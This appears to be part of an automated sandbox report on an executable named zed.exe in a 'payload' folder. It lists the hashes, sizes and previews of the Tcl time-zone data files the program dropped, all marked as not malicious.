                                                                                                                                                                                                                                            SHA-512:20BDFBCD1A5038C81552EBD955F3921DE3447A1F30E64935937768B2B98735AE53049601DCDD2D519646C78E6D03289EB465CFF4F2DADEA7D89A329504C6C475
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Perth) {.. {-9223372036854775808 27804 0 LMT}.. {-2337925404 28800 0 AWST}.. {-1672552800 32400 1 AWDT}.. {-1665381600 28800 0 AWST}.. {-883634400 32400 1 AWDT}.. {-876117600 28800 0 AWST}.. {-860392800 32400 1 AWDT}.. {-844668000 28800 0 AWST}.. {-836470800 32400 0 AWST}.. {152042400 32400 1 AWDT}.. {162928800 28800 0 AWST}.. {436298400 32400 1 AWDT}.. {447184800 28800 0 AWST}.. {690314400 32400 1 AWDT}.. {699386400 28800 0 AWST}.. {1165082400 32400 1 AWDT}.. {1174759200 28800 0 AWST}.. {1193508000 32400 1 AWDT}.. {1206813600 28800 0 AWST}.. {1224957600 32400 1 AWDT}.. {1238263200 28800 0 AWST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):203
                                                                                                                                                                                                                                            Entropy (8bit):4.803539644461131
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIaWhSHAIgPWAvN/2DCoRWJvFBx+DC7WN:MByMjL9t2rOvFel
                                                                                                                                                                                                                                            MD5:401B6B2E30EF17BE20212645287EB94B
                                                                                                                                                                                                                                            SHA1:67D15A45C61122CE680B829FE0FA3A1C501A8C8F
                                                                                                                                                                                                                                            SHA-256:DDA669B9BFB3E08FC23CE67030148B9E4740824ADD8DE02580D6AFD31CE05BAB
                                                                                                                                                                                                                                            SHA-512:F4348F8F4FF261C47854725AEE4E14E7E334B3C31496E5C46B0E0041551CB6861380E684E8888AFE9DA7E8E97236AC322B9CE2738EF245E9D46C9681665F83A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Brisbane)]} {.. LoadTimeZoneFile Australia/Brisbane..}..set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.752918480727309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIDRpGSHAIgSRrN/2DCa7QDCuRpyn:MByMjdpQYrt23QHpy
                                                                                                                                                                                                                                            MD5:D226A0718185854DFE549E00856AA8D5
                                                                                                                                                                                                                                            SHA1:94EE96FAE259D90C2FDF169DD95BD82B3171FFAE
                                                                                                                                                                                                                                            SHA-256:D9DCFDC377901EC0C0FEB9CEA743C2C1425273F69A1BAA7BF3B74FEC5885B267
                                                                                                                                                                                                                                            SHA-512:7EE29A7235CAAEF4889246B7A2241CA9A0D5D2B2E1D56B20141247C93B8736F17280F0D46004AC4588E137D1E76F661C779C906BBFC2B5F8FA73C19F7657F952
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Adelaide)]} {.. LoadTimeZoneFile Australia/Adelaide..}..set TZData(:Australia/South) $TZData(:Australia/Adelaide)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8338
                                                                                                                                                                                                                                            Entropy (8bit):3.847525715050911
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:AZJigk42/yn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:AZJuVnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:C0F1776E011C4C86B7709A592E7CA1EB
                                                                                                                                                                                                                                            SHA1:1CA528D529BF4995E145D6E0D87A8752A3577E7F
                                                                                                                                                                                                                                            SHA-256:FC453486325ADE1D31F14087B76D4936F3A6D551ABD1DB6FCAC129BDB043951C
                                                                                                                                                                                                                                            SHA-512:F872182962C2615A35F012ECAB30C88F07C6BEF0261207AD52706DB22D8CDD0DA65723CD801FDA7C548C5EB0ECFC39DD66CC17503BAA3BBB77BFA35D20650E4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Sydney) {.. {-9223372036854775808 36292 0 LMT}.. {-2364113092 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.777331394201868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DC3neDCVDy:MByMjUQVv8At2+eKy
                                                                                                                                                                                                                                            MD5:9C58D9EFBB03472BBDA76CE2FFAD4BB4
                                                                                                                                                                                                                                            SHA1:30959E3681B64AE26F7FA3957887896C26AF7F19
                                                                                                                                                                                                                                            SHA-256:C94FA7A7640CD00963EE8FF1A3D9DCDA2075408739D998EDBF7CFC998DB764FD
                                                                                                                                                                                                                                            SHA-512:2D6B778217726691F2CB4A4995A8B1AB08DDB7FE4570A3FD04EF54F718F455EF3CBD4EEF1A1BCC99A2088C82A6E89DB455BAF1327CECD6BF608837E50F14A6C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.818875198673406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIvFfkSHAIgoFNNvN/2DCzyQDCMF4:MByMj9fKaNNvt2xQz4
                                                                                                                                                                                                                                            MD5:0B144A2E47C81354BC510BC741DE5150
                                                                                                                                                                                                                                            SHA1:A7396F1741F02C6C208FD1286362E4E0720198B8
                                                                                                                                                                                                                                            SHA-256:DBEF9C5BDD290FEC5FA740D697143332D3CA1FC373CF1DF736F1883AC9BA3298
                                                                                                                                                                                                                                            SHA-512:562B029591F9ADB8C324BA56E849B2B524E91B26D3DB441510194882A8E1E63E6948D041874A00A0A76F29925A1CEAC53DD2AE5D7F23123B6FE919346CBFD8CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Melbourne)]} {.. LoadTimeZoneFile Australia/Melbourne..}..set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.831654343064909
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjXFeyXHAIgoXjrWARL/2QWCCjH0QWCCjQ:SlSWB9vsM3yInHAIgOWAN/2DC00DCt
                                                                                                                                                                                                                                            MD5:5F5916CB038876BE27AA5E2AD74EE085
                                                                                                                                                                                                                                            SHA1:18AC21B638188B542455BA3DA91F958DF1724E68
                                                                                                                                                                                                                                            SHA-256:75ABB7F20C4A0B618138AA190AF33CEAF2A6D2C707DA6C1314E4BFF2F9904F58
                                                                                                                                                                                                                                            SHA-512:ADFD83E292AC1BB5E19255A9B2DA0E3BB9323A5F9B92D458DE34C291D7F9B6CFBBF62AA3351FB320E54F34305DD485ADC72134D21AFA6A27B2B8B7D93DCA2113
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Perth)]} {.. LoadTimeZoneFile Australia/Perth..}..set TZData(:Australia/West) $TZData(:Australia/Perth)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):212
                                                                                                                                                                                                                                            Entropy (8bit):4.918079927018121
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIcKlHAIgJK3N/2DCkuM0DC9KM:MByMjcKeJK3t2kVSKM
                                                                                                                                                                                                                                            MD5:BEDEA56FCE4B2F0A3F3E9319856A5560
                                                                                                                                                                                                                                            SHA1:9FD0FE998A003C6B4CCCD00A977153347DE07F55
                                                                                                                                                                                                                                            SHA-256:55A9264D0414644A1BE342106AE86086A6659596DC9322A74FC4D1DDB41F7C60
                                                                                                                                                                                                                                            SHA-512:7C438B72262B99EDEEB31AC95E0135BB722A3B0B049278B6DE67DB5FB501837FB9C03785233B538E83F4B56104F6EA3B3DA0F7C2275E0F78F232161840AA4C63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Broken_Hill)]} {.. LoadTimeZoneFile Australia/Broken_Hill..}..set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.888429541699473
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/xWh490th4:MByMYdIp7tQ490I
                                                                                                                                                                                                                                            MD5:A8A7A10DA4321819ED71F891480770F8
                                                                                                                                                                                                                                            SHA1:930674EF7711542D7F471A59C1870D4576E027FD
                                                                                                                                                                                                                                            SHA-256:2F594239A434052D36053A2B3EAB134EADBAD06EB6737E67CF72166DAB157537
                                                                                                                                                                                                                                            SHA-512:C6AD1869A713DDE0E4DE53F7894E5CE0B7AEFDDD7C5C3D83BB5B92FB7D8E20B373A6694045053E1AE8EA98A7B7D0C052EF2C21310E47DC650A7A399A5F73D586
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.875339623736144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wKy4oeyXHAIg20wKARL/1bIAJl0IAcGEwKyovn:SlSWB9vsM3y7/rDSHAIgp/AN/xIAE90j
                                                                                                                                                                                                                                            MD5:E0D0EFBEC37E27532B49FF6DD9893DA0
                                                                                                                                                                                                                                            SHA1:9C00993A885AF448E48201A46E17629A7A602FC6
                                                                                                                                                                                                                                            SHA-256:A676562A90FF8587A775F6F0E3BE05D870456A56D25B5330816BF9043C8D475B
                                                                                                                                                                                                                                            SHA-512:AB0E6907F9C0002CA5C050A0069AF013B14BADA08CA4553C96B302C078DF7629D5D7EDE4A19A53DEC6E7B9E6D9857F14EC7A1DB9BC11F2EEC9FFBAC70E129EEE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Noronha)]} {.. LoadTimeZoneFile America/Noronha..}..set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.948480276987682
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0tQJXveyXHAIg20tQJE6RL/1bJHIAcGEtQJXy:SlSWB9vsM3y7tIGSHAIgpt36N/xR90tF
                                                                                                                                                                                                                                            MD5:FCCB5F44903E1B988A058E5BBF5E163B
                                                                                                                                                                                                                                            SHA1:E1CC03DD4A804C7305D8B0C12D8451D08AE262EA
                                                                                                                                                                                                                                            SHA-256:961FB3AB99A63B1E9704B737EAB2D588B5A39D253A213E175CC678BEDFFD498D
                                                                                                                                                                                                                                            SHA-512:F31C80E4AD6EBE6CB8A3382E0052DC47601D073E8F81375D50241105675AA3AB45433FFD0534524D9992ABE1086C6671D85FF7C72B0D6766EB9984426F608B77
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Sao_Paulo)]} {.. LoadTimeZoneFile America/Sao_Paulo..}..set TZData(:Brazil/East) $TZData(:America/Sao_Paulo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.902113962502196
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0znQZF3vXHAIg20znQv5RL/1bbAWVIAcGEznQe:SlSWB9vsM3y7zn+PHAIgpznSN/xn90zN
                                                                                                                                                                                                                                            MD5:9F4B43F4F27D0B7EAC0C5401A1A794B4
                                                                                                                                                                                                                                            SHA1:2A8543B994E93E54BD50EAA78463905E6A8EBE74
                                                                                                                                                                                                                                            SHA-256:0500C9A248C8CE9030EA30D0AF9DD95DC465480BAF60646C0B7C511FA23C6D1F
                                                                                                                                                                                                                                            SHA-512:0ADAF708ACFBD80F4704951EEBC24AD144FD5856997A429279E804F3A7F7F9A8FED41DCEE85BFB1ECDBF1E05137E87E7430186474BCF5DE42067FFC74746F048
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Manaus)]} {.. LoadTimeZoneFile America/Manaus..}..set TZData(:Brazil/West) $TZData(:America/Manaus)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.7984816540097843
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:09+xKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt7:9Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:6DB983AD72FB2A88FC557BE5E873336F
                                                                                                                                                                                                                                            SHA1:C64E988010087ED559A990B3D95078949C9B4D72
                                                                                                                                                                                                                                            SHA-256:E2AEA7CFD428A43D9DB938BCC476623ADC1250BD8057013A7FFF5F89D7FF8EFC
                                                                                                                                                                                                                                            SHA-512:C0A646F80FB2FD42D9146A4FD36CF5A7F62016684F8D5AF80453EC190F4AEA65EDADC5BCF071AE746ABFB43B29C27B2743F2152B6986D41BFDE1617CA774A7C5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CET) {.. {-9223372036854775808 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766623600 3600 0 CET}.. {228877200 7200 1 CEST}.. {243997200 3600 0 CET}.. {260326800 7200 1 CEST}.. {276051600 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}.. {323830800 7200 1 CEST}.. {338950800 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8095769056779916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:e3HgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:eQaUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:A6F88C55E8613A27DE3E6C25B0672910
                                                                                                                                                                                                                                            SHA1:3B593CC17BF153A6209FC5AACE7B88DA9603BD44
                                                                                                                                                                                                                                            SHA-256:73A9841F233AA657AFB6CED8A86A37D55FE5582DD996B9B28975D218BCCC078F
                                                                                                                                                                                                                                            SHA-512:526A922B1594A2800B03F363F7BFEC29203D4A4F2B49C5F2618469F59176CE4F8AFBA0616B226AC39D308DB05DE7147714D9B6CDBB2EA7373A041A4D47F50E2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CST6CDT) {.. {-9223372036854775808 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-84384000 -18000 1 CDT}.. {-68662800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.804821796604604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/0nalGe2IAcGE2NEOyn:SlSWB9vsM3y7UEOXHAIgpUEqA6N/0af9
                                                                                                                                                                                                                                            MD5:33A04963E70EBF29339204348E0DF874
                                                                                                                                                                                                                                            SHA1:456C0DB88ECE4D180EEE5AE5AEF5FBEB6E977D00
                                                                                                                                                                                                                                            SHA-256:6DC6354D761CBE7820C9186568CAB87AD48CA925507F6A740357195B60E16D87
                                                                                                                                                                                                                                            SHA-512:DF8F46827760BD7EC922C6837E0B6649B4FBD220B79E6F1B67FE3DD8CB3D2D035ECDAF4CF6CE5BDE6DC79C6F7B6EE2B9787AF08A97845CD0D647720A2E78D7EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:Canada/Atlantic) $TZData(:America/Halifax)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.863241040396457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0po/vXHAIg20puFvHRL/0nPQox/h4IAcGEpoyn:SlSWB9vsM3y7pYHAIgppuRN/0d490pl
                                                                                                                                                                                                                                            MD5:97E50CE9FBA3F1A6DFCF333F9E6D592C
                                                                                                                                                                                                                                            SHA1:EE472C411079E788DBF32FAC9C5B7EE121960DC2
                                                                                                                                                                                                                                            SHA-256:DB32E83949D62478D229E9FB57BB1624D21B3A9CCEE4CD55335F8262C01D820A
                                                                                                                                                                                                                                            SHA-512:D547E3DC03848A677BE67F7CF4124E067F76EE09BB724A5B10F028BEA72C1526B17678A035B2C53F69498E9ECAACD3C5445D42B7FE58DF706DD2C5F2ADA05A73
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:Canada/Central) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.758562813220951
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/0nbHboxp4IAcGEqM:SlSWB9vsM3y7RQtHAIgpRQPN/0Dboxpp
                                                                                                                                                                                                                                            MD5:4365BEFA3D50EEE20843EF97A095E512
                                                                                                                                                                                                                                            SHA1:7756049B4CD6459742686925E9516E64A9727306
                                                                                                                                                                                                                                            SHA-256:22844994AE893F3236A091B050E932E84A5218EC0D01F72595E17CCC471FA564
                                                                                                                                                                                                                                            SHA-512:CB265E79DF926026BEBF7158590369ABE5353C759540F509ABBA2A7ADBE59A705BC2AB936F400614BE610EDB761DE9A2B1E179A0A8B0A87E595392362C2516AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:Canada/Eastern) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.8181126338833655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx07nKL50vXHAIg207nKLyRRL/0nNYLo/4IAcGE7nK1:SlSWB9vsM3y77G2HAIgp7bN/0W8/4908
                                                                                                                                                                                                                                            MD5:FA0D0024AD72CCE4EC7229FA897FB1B7
                                                                                                                                                                                                                                            SHA1:4373A07F2674FE974189CC801987652AA97F0204
                                                                                                                                                                                                                                            SHA-256:D7A203E60FF19DCDEAAD14121720DE51DA73392D25B40FFA301C1935CDF89517
                                                                                                                                                                                                                                            SHA-512:82EF7F429604A69734B04D298B4C9C9AC3BE57B9DD8C4CECF59C7AB3470BDFBA0505886C4E6AA3864F5EC7FBB4C69C54CF153A6417376828234833013C29A0C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Edmonton)]} {.. LoadTimeZoneFile America/Edmonton..}..set TZData(:Canada/Mountain) $TZData(:America/Edmonton)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.998628928230972
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7tgYJHAIgptVN/0xdBx+90twv:MByMYnKpTt590g
                                                                                                                                                                                                                                            MD5:A2DCCB8BFC65DD4E7C3BB7F10DCEFF11
                                                                                                                                                                                                                                            SHA1:6FD2F4FAE06C5D4D3F189A167A98AA76497569DD
                                                                                                                                                                                                                                            SHA-256:87F42F45FD7D059CA47650D445420DE8320F3A7C1CBC7671FBFA8A8881274433
                                                                                                                                                                                                                                            SHA-512:F42E32C5BD785BA914E5054784BF67DDF951460A708290D1899621CEEDC63475B584FC052A86A3B6D45BF3C651D42427FB6F9CE2A2A33764DFFF731053BECC16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/St_Johns)]} {.. LoadTimeZoneFile America/St_Johns..}..set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.887587766811186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7ZLgXPHAIgpZLgFN/0N290ZLgK:MByMY13p1stx901/
                                                                                                                                                                                                                                            MD5:68900CE38FE0E40578323BBD3D75184E
                                                                                                                                                                                                                                            SHA1:9D5EAB5CBCD495DD46974207FBE354A81DD2070F
                                                                                                                                                                                                                                            SHA-256:5C4FD46054B190A6D4B92585B4DAE4E3A8233EE2996D14472835DDD264911DC6
                                                                                                                                                                                                                                            SHA-512:3EF53F0FCD8D88A1B977886BDFAA03D7B84EF021AC6BEDF7C571BFBF2242BFC3F3EB6A6B6A9C2F6852AF412A96DFBC30F3BB25A6619CBCD8736F3DF5B64DE1BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Vancouver)]} {.. LoadTimeZoneFile America/Vancouver..}..set TZData(:Canada/Pacific) $TZData(:America/Vancouver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
